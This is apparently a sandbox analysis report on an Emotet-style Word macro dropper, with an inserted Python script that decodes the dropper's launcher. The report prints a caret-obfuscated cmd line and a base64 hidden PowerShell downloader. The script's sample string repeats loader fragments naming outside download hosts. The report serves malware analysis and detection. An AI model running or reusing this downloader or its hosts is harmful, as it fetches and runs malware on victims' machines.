                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Windows\symbols\dll\System.pdbom | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\d | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.pdbge | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbdb | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: m.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb | source: powershell.exe, 00000005.00000002.2156319928.0000000002030000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdb | source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
                      Source: Mensaje-22-012021.doc | Initial sample: OLE summary subject = SQL proactive Tools & Tools user-centric Electronics RSS withdrawal Movies, Garden & Clothing Beauty Unbranded Fresh Mouse bluetooth e-enable HDD

                      Data Obfuscation:

                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                      Source: Mensaje-22-012021.doc | Stream path 'Macros/VBA/G8g2gkh6bwry__ui' : High number of GOTO operations
                      Source: VBA code instrumentation | OLE, VBA macro, High number of GOTO operations: Module G8g2gkh6bwry__ui
                      Document contains an embedded VBA with many string operations indicating source code obfuscation
                      Source: Mensaje-22-012021.doc | Stream path 'Macros/VBA/G8g2gkh6bwry__ui' : High number of string operations
                      Source: VBA code instrumentation | OLE, VBA macro, High number of string operations: Module G8g2gkh6bwry__ui
                      Obfuscated command line found
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQ
AUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMA
                      Suspicious powershell command line found
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
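What the two command lines above actually run, as an added worked example (this is not part of the sandbox report): cmd.exe strips the carets (`m^s^g` is `msg`, `p^owe^rs^he^ll` is `powershell`), and `-enc` hands powershell.exe a base64 blob that decodes to UTF-16LE text. The Python below rebuilds that wrapper around fragments copied from the report's own decoded command line (the `-f` format-string reordering that spells out `System.IO.Directory` and `System.Net.ServicePointManager`, backtick-split method names such as `CRE`At`ED`irECtOry`, `[char]92` path separators, the `.replace('FZo', ...)` trick and the `!`-separated download list) and then peels those layers off with regex passes until the text stops changing. The function names, the constructed base64 payload and the assumption that the `x [ sh b` placeholder stands for the `'http'` literal the script assigns are this example's, not the sample's; it is a cleaner for these specific tricks, not a PowerShell interpreter.

```python
"""De-obfuscate the caret-escaped cmd.exe -> encoded powershell.exe launcher in this report.
Added example for this page, not sandbox output. SAMPLE_PS copies fragments of the decoded
command line shown in the report; the base64 wrapper is rebuilt here so it runs offline. The
passes are a best-effort cleaner for this loader's string tricks, not a PowerShell parser."""
import base64
import re
from typing import Dict, List, Optional

# Caret-escaped prefix exactly as logged; make_sample_cmdline() appends a payload built
# from SAMPLE_PS (constructed here) in place of the real blob.
CMD_PREFIX = ("cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng "
              "to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc ")
SAMPLE_PS = (
    "seT-VarIable ('G'+'Hp') ([tYPe](\"{3}{2}{5}{4}{6}{1}{0}\"-f 'Y','TOR','Y','S','Ir','stem.Io.d','EC') ) ; "
    "$Xo37t = [TYpE](\"{2}{3}{1}{0}{4}\"-f'NtMAnaGe','m.nEt.SERVICePoi','sYsT','e','R'); "
    "$Mpdyr_1=$N5_G + [char](33) + $H92K;$G85V=('P'+('5'+'7B')); "
    "( iTeM ('VA'+'RiabL'+'e:GHP')).vAlue::\"CRE`At`ED`irECtOry\"($HOME + (('{0}O3pp1b'+'5{'+'0}'+('Y84vhd'+'h')+'{0}') -F [CHar]92)); "
    "( dir vaRIaBlE:XO37t ).ValUe::\"SeCUrIt`yProto`C`oL\" = (('T'+'ls1')+'2'); "
    "$Pf_wys3 = (('A'+'41')+'O'); "
    "$I3z2csr=$HOME+((('FZoO'+'3'+'pp1')+('b5FZ'+'oY8'+'4vh')+'d'+'h'+('FZ'+'o')).\"rEP`L`ACE\"(('F'+'Zo'),[STRinG][chAr]92))+$Pf_wys3+'.d' + 'll'; "
    "$S84h9hn='h' + 'tt' + 'p'; "
    "$Fouo1h1=(('x '+'['+' sh b'+'://u')+('ag'+'r')+'it'+'ec'+'h'+('.'+'co')+('m'+'/c'+'gi-b')+'i'+('n/'+'a5G'+'/!x')"
    "+' ['+(' '+'sh'+' '+'b://'+'www.91y')+('uda'+'o'+'.co')+('m/wp'+'-'+'ad')+('min/'+'KKH'+'t')+'1');"
)
_REAL_ESCAPES = set("0abefnrtv")   # `t, `n, ... have a meaning; a backtick before any other char is noise
_FORMAT = re.compile(r"([\"'])((?:\{\d+\}|[^\"'{}])*)\1\s*-f\s*('[^']*'(?:\s*,\s*'[^']*')*)", re.I)
_REPLACE = re.compile(r"'([^']*)'\s*\.\s*\"?replace\"?\s*\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.I)

def strip_cmd_carets(cmdline: str) -> str:
    """cmd.exe drops '^' and takes the next character literally: p^owe^rs^he^ll runs powershell."""
    return re.sub(r"\^(.)", lambda m: m.group(1), cmdline)

def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Decode the -EncodedCommand payload (base64 over UTF-16LE text). powershell.exe accepts
    any unambiguous prefix of the switch, so -e, -ec and -enc are all checked."""
    for m in re.finditer(r"(?<![\w-])-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", cmdline, re.I):
        flag = m.group(1).lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except ValueError:          # bad base64 or an odd byte count
                return None
    return None

def _fmt(m: "re.Match") -> str:
    # "{1}{0}" -f 'b','a'  ->  'ab'; a placeholder without a matching argument is left alone
    args = re.findall(r"'([^']*)'", m.group(3))
    try:
        return "'" + re.sub(r"\{(\d+)\}", lambda p: args[int(p.group(1))], m.group(2)) + "'"
    except IndexError:
        return m.group(0)

def _inline_vars(s: str) -> str:
    """Substitute $name wherever the script assigns it a plain literal ($x='abc';)."""
    for name, val in re.findall(r"\$(\w+)\s*=\s*'([^']*)'\s*;", s):
        s = re.sub(r"(?<!\w)\$" + re.escape(name) + r"\b(?!\s*=(?!=))", lambda m, v=val: "'" + v + "'", s)
    return s

_PASSES = (
    lambda s: re.sub(r"`(.)", lambda m: m.group(0) if m.group(1) in _REAL_ESCAPES else m.group(1), s),
    lambda s: re.sub(r"\[char\]\s*(?:\((\d+)\)|(\d+))",                      # [CHar]92 / [char](33)
                     lambda m: "'" + chr(int(m.group(1) or m.group(2))) + "'", s, flags=re.I),
    lambda s: re.sub(r"\[string\]\s*('[^']*')", lambda m: m.group(1), s, flags=re.I),
    lambda s: re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", lambda m: "'" + m.group(1) + m.group(2) + "'", s),
    lambda s: re.sub(r"\(\s*('[^']*')\s*\)", lambda m: m.group(1), s),       # ('x') -> 'x'
    lambda s: _FORMAT.sub(_fmt, s),
    lambda s: _REPLACE.sub(lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", s),
    _inline_vars,
)

def deobfuscate(ps: str, max_rounds: int = 100) -> str:
    """Run the passes until the text stops changing; each round peels one nesting level."""
    for _ in range(max_rounds):
        before = ps
        for p in _PASSES:
            ps = p(ps)
        if ps == before:
            break
    return ps

def extract_urls(ps: str, placeholder: str = "x [ sh b") -> List[str]:
    """Split the '!'-separated download list. ASSUMPTION: the placeholder later gets swapped for
    the scheme literal the script assigns ($S84h9hn='http'); that step is outside the visible excerpt."""
    m = re.search(r"\$\w+\s*=\s*'(https?)'\s*;", ps)
    scheme = m.group(1) if m else "http"
    urls = []
    for lit in re.findall(r"'([^']*)'", ps):
        for part in (lit.split("!") if placeholder in lit else []):
            if part.strip().startswith(placeholder):
                urls.append(scheme + part.strip()[len(placeholder):])
    return urls

def analyze_cmdline(cmdline: str) -> Dict[str, object]:
    plain = strip_cmd_carets(cmdline)
    script = deobfuscate(extract_encoded_command(plain) or "")
    return {"cmd": plain, "script": script, "urls": extract_urls(script)}

def make_sample_cmdline() -> str:
    """Constructed input: the report's caret prefix + base64(UTF-16LE(SAMPLE_PS))."""
    return CMD_PREFIX + base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode("ascii")
```

Running `analyze_cmdline(make_sample_cmdline())` yields the readable launcher: the DLL path `$HOME\O3pp1b5\Y84vhdh\A41O.dll` that rundll32.exe is later seen loading, `ServicePointManager.SecurityProtocol = 'Tls12'` set before the download list is used, and the first entries of that list as plain URLs. `$N5_G` and `$H92K` stay unresolved because the visible excerpt never assigns them.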
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_10004560 LoadLibraryA,GetProcAddress,AddFontResourceW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001508D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001339A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00132A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00135BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00135C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0013548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00132CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00131740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001908D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001739A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00172A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00175BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00175C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0017548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00172CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00171740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E08D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C39A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C2A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C5BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C5C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C2CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C1740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001908D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001739A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00172A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00175BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00175C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0017548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00172CFB push ecx; retn 001Eh

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      (identical NOOPENFILEERRORBOX events in the report: WINWORD.EXE 57, cmd.exe 6, powershell.exe 54, System32\rundll32.exe 1, SysWOW64\rundll32.exe 34; only the first of each is shown)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2588Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      (8 identical FullSizeInformation queries in the report; only the first is shown)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: rundll32.exe, 00000008.00000002.2183555310.0000000000660000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_10004560 LoadLibraryA,GetProcAddress,AddFontResourceW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Encrypted powershell cmdline option found
